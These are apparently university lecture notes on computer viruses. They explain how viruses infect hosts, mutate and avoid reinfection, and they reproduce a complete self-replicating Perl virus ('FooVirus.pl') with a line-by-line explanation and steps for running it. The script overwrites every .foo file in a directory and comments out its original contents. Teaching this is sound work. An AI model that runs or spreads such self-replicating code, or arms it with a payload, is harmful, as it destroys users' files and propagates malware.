VIRUS -Vital Information Resources Under Seize

 

VIRUS -Vital Information Resources Under Seize

• A computer virus is a malicious piece of executable code that propagates typically by attaching itself to a host document that will generally be an executable file.  

• Typical hosts for computer viruses are:

 

– Executable files (such as the ‘.exe’ files in Windows machines) that may be sent around as email attachments

 

– Boot sectors of disk partitions

– Script files for system administration (such as the batch files in Windows machines, shell script files in Unix, etc.)

– Documents that are allowed to contain macros (such as Microsoft Word documents, Excel spreadsheets, Access database files, etc.)

 

• Any operating system that allows third-party programs to run can support viruses.

 

• Because of the way permissions work in Unix/Linux systems, it is more difficult for a virus to wreak havoc in such machines. Let’s say that a virus embedded itself into one of your script files. The virus code will execute only with the permissions that are assigned to you. For example, if you do not have the permission to read or modify a certain system file, the virus code will, in

general, be constrained by the same restriction.   

[Windows machines also have a multi-level organization of permissions. For example, you can be an administrator with all possible privileges or you can be just a user with more limited privileges. But it is fairly common

for the owners of Windows machines to leave them running in the “administrator” mode. That is, most owners of Windows machines will have only one account on their machines and that will be the account with administrator privileges. For various reasons that we do not want to go into here, this does not happen in Unix/Linux machines.]

 • At the least, a virus will duplicate itself when it attaches itself to another host document, that is, to another executable file.

But the important thing to note is that this copy does not have to be an exact replica of itself. In order to make more difficult the detection by pattern matching, the virus may alter itself when it propagates from host to host. In most cases, the changes made to the viral code are simple, such as  earrangement of the order independent instructions, etc. Viruses

that are capable of changing themselves are called mutating viruses.

• Computer viruses need to know if a potential host is already infected, since otherwise the size of an infected file could grow without bounds through repeated infection. Viruses typically place a signature (such as a string that is an impossible date) at a specific location in the file for this purpose.

• Most commonly, the execution of a particular instance of a virus (in a specific host file) will come to an end when the host file has finished execution. However, it is possible for a more vicious virus to create a continuously running program in the background.

• To escape detection, the more sophisticated viruses encrypt themselves with keys that change with each infection. What stays constant in such viruses is the decryption routine.

 

• The payload part of a virus is that portion of the code that is  not related to propagation or concealment.

 

THE ANATOMY OF A VIRUS

 

• As should be clear by now, a virus is basically a self-replicating piece of code that needs a host document to glom on to.

• As demonstrated by the simple Perl script I show in this section, writing such programs is easy. The only competence you need is regarding file I/O at a fairly basic level.

• The virus shown on the next page uses as host documents those files whose names end in the ‘.foo’ suffix. It inserts itself into all such files.

• If you send an infected file to someone else and they happen to execute the file, it will infect their ‘.foo’ files also.

• Note that the virus does not re-infect an already infected file. This behavior is exhibited by practically all viruses. This it does by skipping ‘.foo’ files that contain the ‘foovirus’ signature string.

• It should not be too hard to see how the harmless virus shown here could be turned into a dangerous piece of code.

• As for the name of the virus, since it affects only the files whose names end in the suffix ‘.foo’, it seems appropirate to name it “FooVirus” and to call the script file “FooVirus.pl”.

• You can download the code shown below from the website for these lecture notes.

 

#!/usr/bin/perl

use Cwd;

chdir cwd;

use strict;

use warnings;

### FooVirus.pl

### Author: Avi kak (kak@purdue.edu)

### Date: April 19, 2006

print "\nHELLO FROM FooVirus\n\n";

print "This is a demonstration of how easy it is to write\n";

print "a self-replicating program. This virus will infect\n";

print "all files with names ending in .foo in the directory in\n";

print "which you execute an infected file. If you send an\n";

print "infected file to someone else and they execute it, their,\n";

print ".foo files will be damaged also.\n\n";

print "Note that this is a safe virus (for educational purposes\n";

print "only) since it does not carry a harmful payload. All it\n";

print "does is to print out this message and comment out the\n";

print "code in .foo files.\n\n";

open IN, "< $0";

my $virus;

for (my $i=0;$i<41;$i++) {

$virus .= <IN>;

}

foreach my $file ( glob "*.foo" ) {

open IN, "< $file";

my @all_of_it = <IN>;

close IN;

next if (join ’ ’, @all_of_it) =~ /foovirus/m;

chmod 0777, $file;

open OUT, "> $file";

print OUT "$virus";

map s/^$_/#$_/, @all_of_it;

print OUT @all_of_it;

close OUT;

}

• Regarding the logic of the code in the virus, the following section

of the code

open IN, "< $0";

my $virus;

for (my $i=0;$i<41;$i++) {

$virus .= <IN>;

}

 

reads the first 41 lines of the file that is being executed. This could be the original FooVirus.pl file or one of the files infected by it. Note that FooVirus.pl contains exactly 41 lines of text and code. And when the virus infects another ‘.foo’ file, it places itself at the head of the infected file and then comments out the rest of the target file. So the first 41 lines of any infected file will be exactly like what you see in FooVirus.pl.

• The information read by the for loop above is saved in the variable $virus.

• Let’s now look at the foreach loop in the virus. It opens each file whose name carries the suffix ‘.foo’. The ‘open IN, "< $file"’ statement opens the ‘.foo’ file in just the reading mode (the extra symbol ‘<’ just makes explicit what would be true by default anyway). The statement ‘my @all_of_it = <IN>’ reads all of the file into the string variable @all_of_it.

 

• We next check if there is a string match between the file contents stored in @all_of_it and the string ‘foovirus’. If there is, we do not do anything further with this file since we do not want to reinfect a file that was infected previously by our virus

• Assuming that we are working with a ‘.foo’ file that was not previously infected, we now do ‘chmod 0777, $file’ to make the ‘.foo’ file executable since it is the execution of the file that will spread the infection.

 

• The next statement open OUT, "> $file"; opens the same ‘.foo’ file in the write-only mode. The first thing we write out to this file is the virus itself by using the command ‘print OUT "$virus"’.

 

• Next, we want to put back in the file what it contained originally but after placing the Perl comment character ‘#’ at the beginning of each line. This is to prevent the file from causing problems with its execution in case the file has other executable code in it. Inserting the ‘#’ character at the beginning of each file is accomplished by

map s/^$_/#$_/, @all_of_it;

and the write-out of this modified content back to the ‘.foo’ file is accomplished by ‘print OUT @all_of_it’.

• To play with this virus, create a separate directory with any name of your choosing. Now copy the FooVirus.pl code into that di- rectory and make sure you make the FooVirus.pl file executable. At the same time, create a couple of additional files with names like a.foo, b.foo, etc. and put any random keystrokes in those files. Also create another directory elsewhere in your computer and similarly create files with names like c.foo and d.foo in that directory.

 Now you are all set to demonstrate the beastly ways of the innocent looking FooVirus.

 

 Execute the FooVirus.pl file in the first directory and examine the contents of a.foo and b.foo. You should find them infected by the virus. Then move

the infected a.foo, or any of the other ‘.foo’ files, from the first directory to the second directory. Execute the file you just moved to the second directory and examine the contents of c.foo or d.foo.

 

If you are not properly horrified by the damage done to those files, then something is seriously wrong with you. In that case, stop worrying about your computer and seek immediate help for yourself!